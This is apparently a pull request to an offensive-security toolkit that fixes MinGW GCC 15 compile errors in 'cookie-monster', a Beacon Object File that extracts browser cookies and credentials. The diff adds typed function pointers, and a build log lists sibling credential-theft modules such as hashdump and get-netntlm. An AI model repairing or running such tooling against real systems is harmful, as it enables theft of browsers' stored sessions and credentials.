### PR TITLE
Fix cookie monster function pointer types

### DIFF
--- a/Creds-BOF/cookie-monster/cookie-monster-bof.c
+++ b/Creds-BOF/cookie-monster/cookie-monster-bof.c
@@ -6,6 +6,9 @@
 #include "cookie-monster-bof.h"
 #include "adaptix.h"
 
+typedef HRESULT (WINAPI *PFN_SHGetFolderPathA)(HWND hwnd, int csidl, HANDLE hToken, DWORD dwFlags, LPSTR pszPath);
+typedef BOOL (WINAPI *PFN_PathAppendA)(LPSTR pszPath, LPCSTR pszMore);
+
 // Function declarations
 BOOL download_file(IN LPCSTR fileName, IN char fileData[], IN ULONG32 fileLength);
 BOOL GetBrowserFile(DWORD PID, CHAR *browserFile, CHAR *downloadFileName, CHAR * folderPath);
@@ -71,8 +74,8 @@ DECLSPEC_IMPORT SECURITY_STATUS WINAPI NCRYPT$NCryptDecrypt (NCRYPT_KEY_HANDLE h
 DECLSPEC_IMPORT SECURITY_STATUS WINAPI NCRYPT$NCryptOpenKey (NCRYPT_PROV_HANDLE hProvider, NCRYPT_KEY_HANDLE *phKey, LPCWSTR pszKeyName, DWORD dwLegacyKeySpec, DWORD dwFlags);
 DECLSPEC_IMPORT SECURITY_STATUS WINAPI NCRYPT$NCryptOpenStorageProvider (NCRYPT_PROV_HANDLE *phProvider, LPCWSTR pszProviderName, DWORD dwFlags);
 
-#define IMPORT_RESOLVE FARPROC SHGetFolderPath = Resolver("shell32", "SHGetFolderPathA"); \
-    FARPROC PathAppend = Resolver("shlwapi", "PathAppendA"); \
+#define IMPORT_RESOLVE PFN_SHGetFolderPathA SHGetFolderPath = (PFN_SHGetFolderPathA)Resolver("shell32", "SHGetFolderPathA"); \
+    PFN_PathAppendA PathAppend = (PFN_PathAppendA)Resolver("shlwapi", "PathAppendA"); \
     FARPROC srand = Resolver("msvcrt", "srand");\
     FARPROC time = Resolver("msvcrt", "time");\
     FARPROC strnlen = Resolver("msvcrt", "strnlen");\
@@ -1327,4 +1330,3 @@ VOID go(char *buf, int len) {
         return;
     }
 }
-


### PR DESCRIPTION
Cookie monser bof is not compiling in Mingw GCC 15

Added explicit typedefs for both functions near the top of cookie-monster-bof.c
Updated the IMPORT_RESOLVE macro to instantiate those pointers via Resolver, replacing the generic FARPROC

Before:
```
_bin directory exists
[+] askcreds
[+] autologon
[+] credman
[+] get-netntlm
[+] hashdump
cookie-monster/cookie-monster-bof.c: In function 'GetFileContent':
cookie-monster/cookie-monster-bof.c:107:9: error: too many arguments to function 'SHGetFolderPath'; expected 0, have 5
  107 |         SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, appdata);
      |         ^~~~~~~~~~~~~~~ ~~~~
cookie-monster/cookie-monster-bof.c:108:9: error: too many arguments to function 'PathAppend'; expected 0, have 2
  108 |         PathAppend(appdata, path);
      |         ^~~~~~~~~~ ~~~~~~~
cookie-monster/cookie-monster-bof.c: In function 'GetFirefoxFile':
cookie-monster/cookie-monster-bof.c:440:5: error: too many arguments to function 'SHGetFolderPath'; expected 0, have 5
  440 |     SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, appdata);
      |     ^~~~~~~~~~~~~~~ ~~~~
cookie-monster/cookie-monster-bof.c:442:5: error: too many arguments to function 'PathAppend'; expected 0, have 2
  442 |     PathAppend(appdata, "\\Mozilla\\Firefox\\Profiles");
      |     ^~~~~~~~~~ ~~~~~~~
cookie-monster/cookie-monster-bof.c:443:5: error: too many arguments to function 'PathAppend'; expected 0, have 2
  443 |     PathAppend(appdata, file);
      |     ^~~~~~~~~~ ~~~~~~~
cookie-monster/cookie-monster-bof.c: In function 'GetFirefoxInfo':
cookie-monster/cookie-monster-bof.c:456:5: error: too many arguments to function 'SHGetFolderPath'; expected 0, have 5
  456 |     SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, appdata);
      |     ^~~~~~~~~~~~~~~ ~~~~
cookie-monster/cookie-monster-bof.c:457:5: error: too many arguments to function 'PathAppend'; expected 0, have 2
  457 |     PathAppend(appdata, "\\Mozilla\\Firefox\\profiles.ini");
      |     ^~~~~~~~~~ ~~~~~~~
[!] cookie-monster build failed
dist exists
...
```
After:
```
_bin directory exists
[+] askcreds
[+] autologon
[+] credman
[+] get-netntlm
[+] hashdump
[+] cookie-monster
dist exists
...
```

Tested on Ubuntu 24.04.3 LTS and Arch Linux 